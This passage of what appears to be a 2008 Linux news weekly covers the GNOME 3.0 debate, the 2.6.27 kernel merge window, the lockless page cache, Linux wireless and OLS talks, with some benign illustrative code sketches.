care will be taken to ensure that GTK+ 3.0 will coexist nicely with older
installations.  But, in the end, it's an incompatible ABI change.


At this point, the loudest objections seem
to come from Miguel de Icaza.  He fears that a new version of GTK+ will
leave independent system vendors behind and, perhaps, lead to a series of
ABI-breakage events.  In particular, Miguel takes issue with the plan to
make the ABI changes for the GTK+ 3.0 release, and only add the new
features (which, like much of the GNOME 3.0 plan, are somewhat fuzzy at the
moment) later.  The needed new features, he says, should be driving the
whole process.  And, if at all possible, those features should be added in
a way which does not require an ABI flag day.


It would appear that the GTK+ developers are determined to make this
change, though, so expect it to go forward.  But a GTK+ change is not the
same as a GNOME change; there is no particular need for GNOME to make a
major release just because an important library it uses has done so.
Anybody who has looked at the linkage of a GNOME application knows that
GNOME uses a lot of libraries; they cannot all drive major GNOME
releases.  So, one might ask, what is happening with GNOME in particular
that warrants a 3.0 release?


This question was, arguably, most eloquently asked by Luis Villa, who has described
GNOME 3.0 as "a terrible idea."  Luis's point is that an ABI change is
not enough to motivate a major release; instead, there must be a
fundamental vision of a better way to do things.  That vision, he says, is
not there now.  This is not an unprecedented situation in the GNOME community:


	2.0 almost failed for this exact reason- before there was a clear
	vision about doing usability/simplicity-centered design, the new
	version number was a huge invitation to insert $VISION here,
	leading to all kinds of crack.


A 3.0 process without a clearly-articulated vision will invite the same
sort of "crack."  It will also throw away the rare public relations
opportunity that comes with a major update:


	Finally, from a media perspective: the reason GNOME 2.0 was a
	success in the Linux media, and the reason KDE 4.0 has been a
	failure, is that GNOME 2.0 had a clear, persuasive story around it:
	simplification and usability. No one in the media cared that we had
	a new toolkit, except where it had specific features (mainly i18n)
	that had user benefits.  Writers ate up our usability story- they
	could tell their readers the story we put out there, and it made
	sense to them. KDE 4 has no coherent user-focused story, so this
	incredible opportunity to reach out to the press has been
	squandered.


There are, certainly, interesting ideas to be found in the GNOME
community.  The online desktop ideas, Document-centric
GNOME, and the mobile initiatives are examples.  But it is true that
nobody has, yet, put together a concept of GNOME 3.0 which is broad
enough to unify and direct all that work while simultaneously being concise
enough to fit onto a bumper sticker.  Chances are good that most GNOME
developers do not know what GNOME 3.0 really means; those outside of
the development community will have even less of a clue.


The KDE 4.0 experience should be on the GNOME project's collective
mind as it ponders a possible 3.0 release. Future KDE users may see KDE 4.0 as
the turning point where their desktop 
started becoming truly great, but, for now, it does not look like a whole
lot of fun for the KDE development community.  GNOME developers, one
assumes, would prefer not to have a similar experience.  


GNOME 2.x has been around for some time; it may well be true that it
is time to make a big jump.  It would be gratifying to see some new energy
and directions from the highly creative GNOME development community.  If
the project can come up with a set of overall goals which can inspire that
community toward a set of common ends, GNOME 3.0 could be a
spectacular success.  But those goals, if they exist, have not been
communicated to the community yet, and that is making some GNOME developers
nervous.

		2.6.27 - the rest of the story


The 2.6.27 merge window closed with the 2.6.27-rc1 release on
July 28.  Some 8100 changesets were merged this time around, making
2.6.27 another busy development cycle.  A number of interesting things went
in since last week's update;
the most significant changes visible to Linux users include: 


 There are new drivers for ILI9320 LCD controller chips,
     Cobalt server LCD frame buffers,
     SH7760/SH7763 integrated LCD controllers,
     NXP pca9532 LED controllers,
     Philips PCA955x I2C LED controllers,
     WMI-based hotkeys on HP laptops,
     Maxim MAX73xx I2C port expanders,
     Micronas DRX3975D/DRX3977D DVB-T demodulators,
     DvbWorld 2102 DVB-S USB2.0 receivers,
     MaxLinear MxL5007T silicon tuners,
     Renesas SH7763 evaluation boards,
     Renesas Solutions AP-325RXA boards,
     Renesas R0P7785LC0011RL boards, and
     Atmel integrated touchscreens.

     Also added is "mISDN," a new, modular ISDN driver intended to replace
     older code for a number of ISDN cards.  Support for using mISDN
     drivers remotely via an IP tunnel has been added.


 The Palm T|X handheld computer is now supported.

 The tmpfs filesystem has gained support for asynchronous I/O.

 The hugetlbfs mechanism can now support multiple huge page sizes.
     There is a new directory (/sys/kernel/hugepages) with
     information on huge page allocations.  The x86 (64-bit) architecture
     now supports 1GB pages; PowerPC can go to 16GB.

 Most system calls which create file descriptors can now accept a set
     of flags; this change allows the race-free establishment of close-on-exec
     semantics, requesting non-blocking opens, and more.  Developers
     wanting to use this capability will have to wait for a version of
     glibc which adds the requisite interfaces.

 The unmaintained v850 architecture has been removed.

 The kexec jump patch set,
     which uses the kexec mechanism as an alternative way of implementing
     suspend-to-disk, has been merged.

 The omfs filesystem has
     been merged.

 /proc now has a file (called syscall) for each
     process; when read, it displays the process's current system call and
     the supplied arguments.

 Linux users hoping to upgrade their systems in the near future will be
     glad to know that 
     a series of patches designed to make the kernel scale to 4096
     processors has been merged.
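
The file-descriptor flags item above can be illustrated from user space on a
current system.  This is a minimal sketch under stated assumptions: the
article does not name the individual system calls, so the use of pipe2()
here is an assumption about one of them, and the code requires a Linux system
where Python exposes os.pipe2().  The helper names are hypothetical.

```python
import fcntl
import os

# pipe2() creates the pipe and applies the flags in a single system call, so
# there is no window in which another thread could fork() and exec() while
# the descriptors are still inheritable.
read_fd, write_fd = os.pipe2(os.O_CLOEXEC | os.O_NONBLOCK)


def has_cloexec(fd):
    """Return True if the close-on-exec flag is set on fd."""
    return bool(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)


def is_nonblocking(fd):
    """Return True if fd is in non-blocking mode."""
    return bool(fcntl.fcntl(fd, fcntl.F_GETFL) & os.O_NONBLOCK)


cloexec_set = has_cloexec(read_fd) and has_cloexec(write_fd)
nonblocking_set = is_nonblocking(read_fd) and is_nonblocking(write_fd)

os.close(read_fd)
os.close(write_fd)
```

The older alternative, creating the descriptor and then setting the flag with
a separate fcntl() call, leaves a short interval in which a concurrent
fork()/exec() can leak the descriptor into a child process.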


Changes visible to kernel developers include:


 The tracehook mechanism for defining static trace points (described in
     this article) has been
     merged, along with a number of trace points in the core kernel.

 A new, lockless form of get_user_pages() has been added:

	int get_user_pages_fast(unsigned long start, int nr_pages, int write,
				struct page **pages);

     Details of this interface can be found in this article, with the one
     note that early versions were called fast_gup() instead.
     (See also the related lockless page cache work,
     which was also merged).

 The long-debated mmu-notifiers patch has
     been merged.  The notifiers 
     allow external memory management units (as may be seen in some
     graphics cards or in virtualized guests) to be told about decisions
     made by the core memory management code.

 There is a new framework for debugging boot-time memory
     initialization; there's also "a few basic defensive measures" intended
     to prevent difficult-to-debug boot problems.

 The new function:

	int object_is_on_stack(void *obj);

     returns a true value if the pointed-to object is on the current kernel
     stack.  

 There is a new macro for issuing warnings:

	WARN(condition, const char *fmt, ...);

     It's much like WARN_ON() in that it will produce a full oops
     listing; the difference is the added printk()-style format
     string and arguments.

 A new helper function:

	int flush_work(struct work_struct *work);

     waits for the specific workqueue job work to finish
     executing. 

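 dma_mapping_error() and pci_dma_mapping_error() have
     new prototypes:

	int dma_mapping_error(struct device *dev, dma_addr_t dma_addr);
	int pci_dma_mapping_error(struct pci_dev *hwdev, dma_addr_t dma_addr);
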
     In each case, they have gained a new argument specifying which device
     the mapping is being done for.

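 There are a couple of new radix tree functions:

	unsigned int radix_tree_gang_lookup_slot(struct radix_tree_root *root,
			void ***results, unsigned long first_index,
			unsigned int max_items);
	unsigned int radix_tree_gang_lookup_tag_slot(struct radix_tree_root *root,
			void ***results, unsigned long first_index,
			unsigned int max_items, unsigned int tag);
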
    They are useful for looking up multiple items in a single call.

 Slab cache constructors no longer have a pointer to the cache itself
     as an argument; they now take a single void * pointer to
     the object itself.

 The long list of Video4Linux2 ioctl() callbacks has been
     moved into its own structure (struct v4l2_ioctl_ops) which is
     pointed to by the ioctl_ops member of struct
     video_device. 


Now begins the long task of finding and fixing all the bugs in all this new
code.  If the usual pattern holds, that process will take about two months,
suggesting that we can expect 2.6.27 sometime in October.

		Harald Welte on his new role with VIA


Hiring a well-known free software advocate to oversee efforts to work with
the community is a good plan for any company, but for a company that has
had rocky community relations, it may be essential.  VIA Technologies has
done just that, by contracting with Harald Welte to help guide its
strategy to work more closely—and less contentiously—with the
community.  VIA announced a
new effort aimed at cooperation with the free software world last April,
but got off to a slow start that had people wondering about its commitment to
fulfilling that promise.  Welte will be well placed to ensure that
community concerns are heard within VIA.


Highly visible in the community for his work on things like
netfilter/iptables and, more recently,
the Openmoko phone, Welte
has the skills to provide VIA with excellent advice.  He has also won
several awards for his work on GPL enforcement as founder and driving force
behind the gpl-violations.org project.  We
caught up with Welte at this year's Ottawa Linux Symposium to discuss his
new role.


Because of his work on Openmoko, Welte had been traveling frequently
to Taiwan, making a number of industry
contacts amongst the companies located in Taiwan.  About nine months ago,
he was "invited to talk to VIA and give them some feedback from the
community".  The company, he says, knew from the beginning it needed
community input, but how to get that was not decided until late May or early
June, when they asked Welte to provide it on a regular basis.


The push from within VIA came from management, specifically product
management, which is somewhat surprising—in
the US and Europe, at least, it is typically engineering that pushes for better
community relations.  "It's a really big opportunity for me being a
representative of the community to talk to a company at this high of a
level.  That's what makes me very optimistic."


VIA primarily needs to get drivers and other software for their graphics
hardware cleaned up and submitted upstream.  It is not just the X.org
drivers for 2D and 3D graphics that need to be mainlined; there are also DRM
and DRI patches that are maintained out-of-tree.  He wants to see kernel
patches get moved upstream to kernel.org, while X patches get merged into
X.org code.  A free 2D driver supporting most VIA chips, old and new, will be
available soon.


Welte sees his role as "focusing more on the open source strategy inside
VIA".  That includes improving the skills of VIA's R&D group so that they
produce drivers that are mainline quality.  Various kinds of problems exist
in the drivers: the coding style may not meet the kernel requirements, or
they may not use the proper APIs.  Currently, drivers exist for new
products that are supposed to ship with mainline drivers available; Welte
will help ensure that happens. "I perceive myself as community person
rather than a VIA person."


He points to Intel as a "shining star" example of supporting free
and open 
source software, though "sometimes they might focus a bit too much on
drivers than on open documentation," especially for wireless hardware.
One of the areas that VIA is working on is open documentation for its
hardware, but Welte isn't sure when those will be released—though
some 800 pages were
released this week.  Schedules are
largely out of his control, as they are subject to a wide variety of
variables within VIA.


His role with VIA is a chance to "really make a silicon manufacturer
understand how the 
open source community works and what the benefits are to working with
it". 
He will be traveling back and forth from his home in Berlin quite a bit;
"that's good, I love Taipei".  He has also started to learn to
speak 
Chinese.


It seems like a great fit that, in some ways, Dave Jones predicted in his
blog posting linked above: "I'm beginning to think the only way VIA will
ever really 'get it together' is if they employed someone from the Linux
community who actually understands how all this works, because it seems
someone in Taiwan isn't getting the memos."  Perhaps a little late,
but it 
seems that VIA has gotten and understood the memos now.


		MARS and The Cell Broadband Architecture


This article is based on a talk given by Geoff Levand at the
Linux Symposium
in Ottawa on July 24, 2008.


The latest
TOP500 Supercomputers list was released last month and the new front-runner
is using a processor quite unlike what you would find in your laptop.


The Cell Broadband Architecture (simply referred to as "Cell" in this article) was produced as a joint venture between IBM, Toshiba and Sony.  The Cell is available in server hardware but is most commonly found in Sony's PlayStation 3 gaming console.


The Cell is interesting because of its unusual design and performance characteristics.  The Cell is described as a heterogeneous multicore CPU.  It has one Power Processing Element (PPE) which is a general purpose processor and up to 8 Synergistic Processing Elements (SPEs).  An SPE is a high-performance vector processing unit with 256KiB of local memory and its own DMA unit.  The PPE, SPEs and memory and I/O controllers are connected by a high speed bus.

The PPE is quite slow compared to modern processors so the SPEs must be used to achieve good performance.  This means writing software that takes the Cell's design into consideration because there is no simple way to optimize existing applications.  Once an application has been designed to use the Cell's SPEs effectively it may run many times faster than when run on a traditional CPU.  


GCC with the Cell SDK can emit code for both the PPE and SPEs, including passing messages and managing overlays when the SPE code size exceeds 256KiB.  The Linux kernel can also manage multitasking the SPEs with its scheduler.  These conveniences make it easier to write code for the Cell processor, but they can have a significant impact on performance.  Preemptive multitasking on an SPE involves swapping all the
local memory of the current process with the local memory of the process to be
run.  This requires time and bus bandwidth for the processor.  Ideally you would always have at least as many SPEs as processes you need
to run so that your process would never be swapped out.


The Multicore Application Runtime System (MARS) framework is a prototype of a
cooperative multitasking system for the Cell that tries to address the performance overhead of running many processes on the Cell's available SPEs. 
MARS uses a library on the PPE and a very small kernel on the SPEs.


MARS currently has a priority-based cooperative scheduler.  This scheduler lets you specify how much context you need to save when your process is swapped out.  In the "run complete" case, no context needs to be saved, allowing
the next process to run much more quickly.


Processes running on the Cell's SPEs and PPE commonly need to synchronize with each other.  The only way to synchronize with the existing Cell SDK is to cause your SPE to busy-wait on a semaphore, but the MARS scheduler gives you the option of swapping out a process and doing other work instead.


Cooperative multitasking does have its downsides.  You lose protection between your processes, and one process could hang and require intervention to release the PPE.  It is also necessary to place manual yield points
throughout your code or design each process to be short-lived.  However, if your application needs to make the most of the Cell architecture, MARS is a promising starting point and addresses the need for a more efficient approach to scheduling.
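
The idea of priority-based cooperative scheduling with manual yield points
can be sketched in a few lines.  This is not the MARS API, which is not shown
in the talk summary above; it is a generic model using Python generators, and
the names run_cooperative and worker are hypothetical.

```python
import heapq


def run_cooperative(tasks):
    """Run generator-based tasks; a lower priority number runs first.

    Each task runs until its next yield; nothing ever preempts it.
    Returns the order in which the tasks' steps were executed.
    """
    trace = []
    queue = []
    for order, (priority, name, gen) in enumerate(tasks):
        heapq.heappush(queue, (priority, order, name, gen))
    seq = len(queue)
    while queue:
        priority, _, name, gen = heapq.heappop(queue)
        try:
            step = next(gen)      # run until the task yields voluntarily
        except StopIteration:
            continue              # ran to completion: no context to keep
        trace.append((name, step))
        heapq.heappush(queue, (priority, seq, name, gen))
        seq += 1
    return trace


def worker(steps):
    """A task that does `steps` units of work, yielding after each one."""
    for i in range(steps):
        yield i                   # manual yield point


by_priority = run_cooperative([(1, "low", worker(2)), (0, "high", worker(2))])
round_robin = run_cooperative([(0, "a", worker(2)), (0, "b", worker(2))])
```

The downside mentioned above is visible in the model: a task that never
reaches a yield would keep control forever, since the scheduler only runs
when a task gives up the processor.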


		The lockless page cache


One of the biggest problems in kernel development is dealing with
concurrency.  In a system where more than one thing can be happening at
once, one must always take care to keep multiple threads of control from
interfering with each other and corrupting the system as a whole.  In the
same way that two roads become more dangerous when they intersect,
connecting two or more processors to the same memory greatly increases
their potential for the creation of mayhem.

Travelers to the US are often amused (or irritated) by the often-favored
solution to roadway concurrency: putting in traffic lights.  Such a light
will indeed (if observed) eliminate the potential for a number of
unpleasant race conditions within intersections, but at a performance cost:
traffic going through the intersection must often stop and wait.  This
solution also scales poorly; as more roads (or lanes with different
destinations) feed into the same intersection, each of them experiences
more red-light time.


In kernel programming, the first tool for controlling concurrency - locks
in various forms - is directly analogous to traffic lights.  It is not
coincidental that the name for a common locking primitive (semaphore)
matches the name for a traffic light (semaforo) in a number of
Latin-derived languages.  Locks enforce exclusive access to a kernel
resource in the same way that a traffic light enforces exclusive access to
an intersection, and with many of the same costs.  When too many processors
end up waiting at the same lock, the performance of the system as a whole
can suffer significantly.


There are two common approaches to mitigating scalability problems with
locks.  For many years after the 2.0 kernel came out, these problems were
addressed through the creation of more locks, each controlling a smaller
resource.  Lock proliferation is effective, in that it reduces the chance
that two processors will be trying to acquire the same lock at the same
time.  Since it works so well,  this approach has led to the creation of
thousands of locks in the Linux kernel.


Proliferation has its limits, though.  Adding locks increases complexity;
in particular, with more locks, the chances of creating occasional deadlock
situations increase.  Deadlocks can be avoided through the careful
observation of rules on the acquisition of locks, and the order in which
they are acquired in particular.  But nobody will ever be able to sort out
- and document - the proper relative locking order for thousands of locks.
So kernel developers must make do with rules for some of the most important
locks and the vigilance of the lockdep tool to find any remaining problems.
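
The lock-ordering rule can be shown with a user-space sketch.  It assumes a
simple convention that is not taken from the kernel: whenever two locks are
needed, they are always acquired in one global order (here, by object
identity).  The helper names are hypothetical.

```python
import threading


def acquire_in_order(*locks):
    """Acquire all locks in one global order (by id()); return that order."""
    ordered = sorted(locks, key=id)
    for lock in ordered:
        lock.acquire()
    return ordered


def release_all(ordered):
    """Release locks in the reverse of the order in which they were taken."""
    for lock in reversed(ordered):
        lock.release()


lock_a = threading.Lock()
lock_b = threading.Lock()
counter = 0


def update(first, second, rounds):
    global counter
    for _ in range(rounds):
        held = acquire_in_order(first, second)
        try:
            counter += 1
        finally:
            release_all(held)


# The two threads name the locks in opposite order, which would risk an
# AB/BA deadlock if each thread simply took its first argument first.
t1 = threading.Thread(target=update, args=(lock_a, lock_b, 1000))
t2 = threading.Thread(target=update, args=(lock_b, lock_a, 1000))
t1.start()
t2.start()
t1.join()
t2.join()
```

With two locks the rule is trivial to state; the point made above is that
nobody can write down and maintain such an ordering for thousands of locks.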


The other problem with lock proliferation is harder to get around, though.
The acquisition of a lock requires writing a value to a location in shared
memory.  As each processor acquires a lock, it must change that value,
which causes that processor to acquire exclusive access to the cache line
holding the lock variable.  The cache lines for heavily-used locks will fly
around the system in a way that badly hurts performance, even if no
processor ever has to wait for another to release the lock.  Adding more
locks will not fix this problem; instead, it will just create more bouncing
cache lines and make things worse.


So, as the number of processors grows, the path to continued scalability
must not include the wholesale creation of new locks; indeed, it requires
the removal of locks in the most performance-critical paths.  And that is
what this whole long-winded introduction leads up to: the 2.6.27 kernel
will include some changes by Nick Piggin which implement lockless operation in some
important parts of the virtual memory subsystem.  And those, in turn, will
lead to faster operation on multiprocessor systems.


The first of these changes is a new function for obtaining direct access to
user-space pages from the kernel:

	int get_user_pages_fast(unsigned long start, int nr_pages, int write,
				struct page **pages);

This function works much like get_user_pages(), but, in exchange
for some limits on its operation, it is able to do its job without
acquiring the mmap semaphore; that, in turn, can lead to a 10% performance
boost on "a threaded database workload."  The details of how this function
works were covered here last
March (though the function was called fast_gup() back then),
so we'll not repeat that discussion here.

The other big change is a set of patches which Nick has been carrying for
quite some time: the lockless page cache.  The page cache holds in-memory
copies of pages from files on disk; its purpose is to improve performance
by minimizing disk I/O.  Looking up pages in the page cache is a common
activity; it happens as a result of file I/O, page faults, and more.  So it
needs to be fast.  In 2.6.26 kernels, each mapping (each connection between
the page cache and a specific file in a filesystem somewhere) has its own
lock.  So processors will not normally contend for the locks unless they
are operating on the same file.  But locks for commonly-accessed files
(shared libraries, for example) are likely to be frequently bounced between
processors.

Most page cache operations are lookups - read-only operations which make no
changes.  In the lookup operation, the lock protects a few aspects of the
task, including:


 A given page within the mapping must be looked up in the mapping's
     radix tree to find its
     location in memory (if any).

 If the page is resident in the page cache, it must have its reference 
     count increased so that it will not be evicted before the code
     performing the lookup has done whatever it needs to do.


The radix tree, itself, is a complicated data structure; it must be
protected from modification while the lookup is being performed.  For
certain, performance-critical parts of the radix-tree code, that protection
is done through (1) some rules on what can be called when, and
(2) the use of read-copy-update (RCU).  As a result, the radix tree
lookup can be done in a lockless manner.

There is still a problem, though: a given page may be evicted from the page
cache (or simply moved) between steps (1) and (2) above.  Should that
happen, the second step will increment the reference count for a page which
now belongs to a different mapping, and return an incorrect pointer.  The
kernel developers have, through lots of experience over many years, learned
that system crashes resulting from data corruption are quite hard on
throughput.  So true scalability requires that this kind of scenario be
avoided; thus the per-mapping lock, which prevents page cache changes from
being made until the reference count has been properly updated.

Nick made an interesting observation here: it actually doesn't matter if
the wrong reference count gets incremented as long as one ensures that the
specific page mapping is still valid afterward.  The result is a new,
low-level page cache function, page_cache_get_speculative().


If the given page has a reference count of zero, then the page has
been removed from the page cache; in that case this function returns zero
and the reference count will not be changed.  If the reference count is
non-zero, though, it will be increased and a non-zero value will be
returned. 

Incrementing a page's reference count will prevent that page from being
evicted or moved until the count goes back to zero.  So kernel code which
has incremented a specific page's reference count will thereby ensure that the page
stays in its current state.  In the page cache case, the code can obtain a
speculative reference to a page found in a mapping's radix tree.  But it
does not, yet, know whether it actually got a reference to the page it was
looking for - something may have happened between the radix tree lookup and
the obtaining of the reference.  So it must check - after the reference has
been acquired - to be sure that it has the right page.  If not, it releases
the reference and tries again.  Eventually it will either pin down the right page
or verify that the relevant part of the file is not resident in memory.
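
The lookup-then-recheck pattern described above can be modeled in a few lines.  What follows is a toy Python sketch, not kernel code: the Page class, its lock-emulated counter, and the dictionary standing in for the radix tree are all assumptions made for illustration.  Only the idea of a speculative reference followed by a recheck comes from the discussion above.

```python
import threading


class Page:
    """Toy stand-in for struct page (hypothetical, for illustration only)."""

    def __init__(self, name):
        self.name = name
        self.refcount = 1                 # the page cache's own reference
        self._atomic = threading.Lock()   # emulates one atomic instruction

    def get_speculative(self):
        """Take a reference unless the count is zero; report success."""
        with self._atomic:
            if self.refcount == 0:
                return False              # page is on its way out
            self.refcount += 1
            return True

    def put(self):
        """Drop a reference taken earlier."""
        with self._atomic:
            self.refcount -= 1


def find_get_page(tree, key):
    """Lockless lookup: find the page, pin it, then confirm it is still the
    page stored under `key`.  `tree` is a dict standing in for the radix tree."""
    while True:
        page = tree.get(key)              # step 1: lookup
        if page is None:
            return None                   # not resident
        if not page.get_speculative():    # step 2: speculative reference
            continue                      # being freed; look again
        if tree.get(key) is page:         # recheck after pinning
            return page
        page.put()                        # wrong page: release and retry
```

The retry loop assumes, as in the scenario described above, that a page whose count has reached zero is also being removed from the tree; a model that left such a page in place would spin forever.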

Lockless operation forces a bit more care on the part of the page reclaim
code, which is trying to get a page's reference count down to zero so that
it can remove the page.  Since there is no locking around the reference
count now, the reclaim code must set it to zero while checking, in an
atomic manner, that nobody else has incremented it.  That is the purpose
of the atomic_cmpxchg() function, which will only perform the
operation if it does not collide with another processor.  Since
page_cache_get_speculative() will not increment the reference
count if it is zero, the reclaim code knows that, by getting that count to
zero, it now has exclusive control of the page.
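
The interplay between the reclaim side and the lookup side can be illustrated with a small model.  This is a hedged Python sketch: AtomicCount, try_to_reclaim(), and the expected_refs parameter are hypothetical names, and a lock stands in for the atomicity that the hardware provides to atomic_cmpxchg() in the kernel.

```python
import threading


class AtomicCount:
    """Toy atomic counter (hypothetical); the lock emulates hardware atomicity."""

    def __init__(self, value):
        self._value = value
        self._guard = threading.Lock()

    def cmpxchg(self, expected, new):
        """Store `new` only if the value equals `expected`; return the old value."""
        with self._guard:
            old = self._value
            if old == expected:
                self._value = new
            return old

    def inc_not_zero(self):
        """Lookup side: take a reference unless the count is already zero."""
        with self._guard:
            if self._value == 0:
                return False
            self._value += 1
            return True

    def read(self):
        with self._guard:
            return self._value


def try_to_reclaim(count, expected_refs=1):
    """Reclaim side: drop the count to zero only if nobody else holds a
    reference.  `expected_refs` is the number of references the caller
    believes are legitimately outstanding (an assumption of this sketch)."""
    return count.cmpxchg(expected_refs, 0) == expected_refs
```

If a lookup increments the count first, the compare-and-exchange fails and the page stays in the cache; if reclaim wins, the count is zero and later speculative references are refused.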


The end result of all this is that a set of locking operations has been
removed from the core of the page cache, improving the scalability of that
code.  There is, of course, a cost, in the form of trickier code with a
more complex set of rules which must be followed.  Chances are that we will
see more of this kind of code, though, as the number of processors in our
systems increases.

		OLS: The state of Linux wireless networking


Kernel wireless maintainer John Linville outlined the past, present, and future
of the Linux wireless stack on the first day of this year's Ottawa Linux Symposium.  In
his presentation, he ranged from early efforts, which were "a sore
spot for Linux" to the future where it is likely that Linux will have
support for some features before "that other OS".  Along the
way, he looked at various issues that wireless support in Linux faces,
including vendor participation, suspend and resume, and regulatory issues.


Linville has been the maintainer of Linux wireless for two and a half years since
being recruited into the job by David Miller and Jeff Garzik.  When he took 
over, wireless support was in disarray, as there were competing stacks to
support different hardware.  Users were faced with lots of pain in getting
things working when "they just want their hardware to work,"
said Linville. Since that time, things have greatly changed.


The original wireless hardware was what is called "Full MAC hardware",
where the implementation of the wireless protocols was handled by the
hardware, generally in firmware.  The drivers made these devices appear to
be regular wired ethernet devices, though they did require some special
configuration for SSID and the like.  Because the hardware would enforce
various regulatory requirements, vendors would generally work with the
community in order to support the hardware.


All of that changed with the advent of "Soft MAC hardware"—which
Linville likened to winmodems—where the CPU implements most of the
protocol.  It is a cheaper solution for vendors, but it requires an 802.11
stack for the kernel.  The ieee80211 drivers came along to support
the Intel Centrino wireless hardware, but they only supported those few
devices.  Johannes Berg added the ieee80211softmac driver that
added some additional hardware support, but it was a kludgy solution.
Since then, Linville said, folks have realized that it was "sort of a
mistake to go down that road".


Enter the Devicescape stack.  It was a feature-rich 802.11 stack for Linux
that was popular with developers.  After some locking and SMP problems were
resolved, it was merged into 2.6.22 as the mac80211 driver.  Once
that happened, wireless drivers 
started using it, to the point where Linville showed a chart of the current
drivers, almost all of which use mac80211. "It's been a boon
to us to pick up the mac80211 code."


One notable driver that does not support mac80211 is the libertas
driver for the OLPC.  Unlike most other current devices, it is a Full MAC
device with special requirements.  It has support for power saving modes
that do not yet exist in mac80211.  Because it is a mesh-networking
device that still participates in forwarding network traffic when the
system is powered down, it has needs that are not yet supported.


Drivers in progress was the next topic Linville addressed.  Several of
these are in need of developers to work on them, specifically for the Airgo
chipset and Atmel USB chipset.  The TI chipset drivers have had some
questions raised about the reverse engineering process and may require a
legal vetting similar to what the SFLC did for ath5k.  Marvell is
sponsoring development of a mac80211-based driver for its
hardware.  This driver may also support 802.11n, which allows for greater range
and higher speeds than current-generation 802.11.


Using data from LWN, Linville looked at the activity level of the wireless
development in Linux.  He was amazed to note "how much of the 2.6.26
kernel came through this laptop".  Using his Signed-off-by as a
proxy for wireless LAN commits, he noted 4.3-5.6% of the kernel commits in
the last three releases (.24 through .26) were for wireless.  In each
kernel, wireless was either the fourth or fifth highest number of commits.


The compat-wireless-2.6 project is aimed at supporting newer hardware in
older kernels.  Because folks are wary of running kernel.org kernels or
their distribution supports an older kernel—but they want to run with the
latest hardware—the project backports wireless drivers to kernels as
old as 2.6.21.  It is a set of scripts and patches that build against the
user's kernel.  Unfortunately, the project may not last much longer as the
multiqueue changes that have been merged for 2.6.27 may change the drivers
enough that they will be infeasible to backport.


At the top of the list for new features is removal of the wireless
extensions in favor of the new cfg80211 mechanism. According to
Linville, "nobody likes wireless extensions, and nobody likes the
existing 
tools".  The wireless extensions have vague semantics, can have
problems with race conditions, and because they are implemented by
ioctl() calls, they encourage duplication of code in multiple
drivers.  cfg80211 will bring a much cleaner API along with
fixing some existing bugs like the 31 character limit for SSIDs.


Access point (AP) mode is another feature that is coming.  Typically, APs
use similar or identical hardware to that in wireless MACs.  For Soft MAC
hardware, all that is needed is support on the CPU side for AP mode, which
is coming for mac80211.  Mesh networking, which has been
popularized by the OLPC project, is also coming to mac80211.
Cozybit has provided an implementation which will allow Linux to have a
feature unavailable for Windows.


Areas that need attention, but are not yet being worked on, were next on
Linville's agenda.
Suspend and resume support is "flawed for mac80211
due to connection management issues".  Because mac80211 is
unaware of suspend and resume, drivers must work around it by de-registering
and re-registering with it, which can be slow.  Adding support for suspend
and resume 
is on the list, as is supporting power saving modes.


Linville went on to discuss three big issues that are largely outside of
the control of the wireless hackers: firmware licensing, vendor participation,
and regulatory concerns.  Because drivers for Windows come with the
firmware in the driver, many hardware vendors do not license the firmware
blob separately.  This means that it is unclear what can be done with those
blobs.  Certain vendors—Intel and Ralink were specifically called
out—provide liberal licenses for their firmware.  Users are
encouraged to "vote with your dollars" by purchasing devices
that either do not require firmware or that have a clear, free software
friendly license. 


Another consideration when deciding which vendors to support is whether
they are engaged with the community.  For the most part, all vendors but
Broadcom are working with the wireless hackers by providing documentation
and/or source code. Some are even providing
dedicated developers to work on Linux drivers—Intel was the first,
but both Atheros (which just released a driver for its ath9k
hardware) and Marvell have also begun doing that.


Government regulations about what can and cannot be done in the unlicensed
frequencies used by wireless are a concern that is frequently cited by
vendors when refusing to work with the community.  Unfortunately, their
concerns are not completely without merit as hardware vendors are expected
to ensure compliance with the regulations.  "Non-compliance could be
a huge loss" for those companies.  As Linville points out, though,
most vendors find a way to support Linux drivers.


In answer to a question, Linville said that most WiMAX and 3G wireless
devices are Full MAC designs, so there should be little or no regulatory
concern, which, in turn, means that Linux support should not be much of a
problem—at least until Soft MAC devices come along.  Overall, Linux
wireless has come a long way, but there is lots still to do.  One gets the
sense that the wireless team is up to the task.


		OLS: Shuttleworth on free software development


In the third keynote given at this year's Ottawa Linux Symposium (OLS),
Mark Shuttleworth spoke about "The Joy of Synchronicity".  In his speech,
he discussed his idea of synchronizing releases between major
distributions but he also advocated time-based, rather than
feature-based, releases for free software in general.  He believes that a
release has value in and of itself; by doing them on a regular schedule, a project will
get into a kind of cadence that is useful for developers, testers, and
users.


Before starting, Shuttleworth was subjected to the traditional introduction
by the previous year's keynote speaker—James Bottomley, in this
case. Bottomley looked 
at Shuttleworth's postings to newsgroups over the years, noting three
year-long valleys in the graph where there were no postings.  It turns out these
corresponded to events in Shuttleworth's life.  The first is when he
received a substantial amount for selling Thawte to Verisign: "when
someone is being productive on the mailing list, never give them half a
billion dollars," Bottomley said.  For the second, he has a pretty
good excuse as he was not on planet earth; the last corresponds to starting
Ubuntu. 


In a nod to Bottomley and the other kernel hackers, Shuttleworth mentioned that
he had been working on his slides up until close to the start of his
speech, while doing some unrelated things in the background—like updating
his system.  That picked up a new kernel as well and he did a suspend to RAM
when he was done; only later in the cab ride to the Congress Centre did he
think: "maybe that was a mistake".  It turned out to work
just fine, which is a testament to both the kernel and to distribution
update mechanisms.


The alliterative theme of the speech was that free software development
should be guided by "cadence, collaboration, and
customers".   The cadence is a regular schedule for releases, similar to
what GNOME—who pioneered this technique, according to
Shuttleworth—and the Linux kernel 
do.  This gets a project into a rhythm that makes it more predictable,
which enables all interested people to schedule themselves around it.  He
compared this to various development methodologies such as "Agile" and "Lean".


Industries are governed by rules, so if you want to change an industry, you
"have to find which rules are only in our heads".
Cross-project collaboration is one of those rules. "Nowhere is it
written that projects can't collaborate."  It is harder to do that
if each distribution is working with different versions of the various
base-level tools: the kernel, X.org, GNOME/KDE, OpenOffice.org, Mozilla, and so
on. 


Shuttleworth contends that it is releases, rather than features, that bring
attention to Linux.  In answer to critics who believe that distributions
should compete with each other, he says that is just "an opportunity
to create friction."  Free software companies don't compete on
versions, but rather on philosophies and what things they focus on.  He likens
it to food courts or automobile sales malls where there are many choices in
one location which serves to increase the sales of all.


For major transitions, Shuttleworth is a fan of establishing meta-cycles,
the idea that every N releases is a major release, which may result in
breaking some backwards compatibility or introducing completely new
